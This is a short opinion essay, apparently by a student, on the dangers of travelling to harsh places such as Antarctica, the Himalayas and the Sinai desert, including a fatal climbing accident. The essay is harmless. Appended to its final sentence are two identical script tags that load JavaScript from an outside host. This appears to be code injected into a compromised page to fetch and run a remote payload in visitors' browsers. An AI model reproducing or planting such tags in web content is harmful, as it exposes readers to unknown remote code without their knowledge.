travelling to places with difficult conditions

Although no doubt travelling to a new place is impressing and attractive, we have to consider which place is safe to visit. While many people encouraging visiting areas with extremely difficult conditions, I think there are many drawbacks to this point of view.

We cannot deny the high interest of many people in every strange idea. They find traveling to a place with difficult situations is a method for fame and excitement. For example, they may choose to go to a very cold region as the Antarctic or climbing a very high mountain in the Himalayas, or even visiting an expanded desert like the Sahara Desert for just taking exciting photos and selfies. Later on, they got proud of themselves and happy with these photos spread through social media and attracting the attention of everyone seeing them.

Meanwhile exploring these new places could be beneficial, but to some extent, and in certain situations. For instance, researchers and scientists especially when trying to study certain species or having new experiments with certain requirements.

However, this can carry a very high risk if any spontaneous accident occurs, or if they got lost for any reason. I still remember an accident that happened a couple of years ago for a group of teenagers in the Sinai Desert in my hometown, they decided to climb the highest mountain there and unfortunately, they got freeze after reaching the peak of the mountain due to decreased temperature, and many of them died before the relief plane could reach their site and help the rest of them. To escape such situations, they have to be fully equipped and trained for facing these problems and to know how to tackle them.

To sum up, visiting new places with difficult conditions could be adventurous and exciting but we have to be sure it is also safe and applicable, otherwise, this could be easily threatening to our lives.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>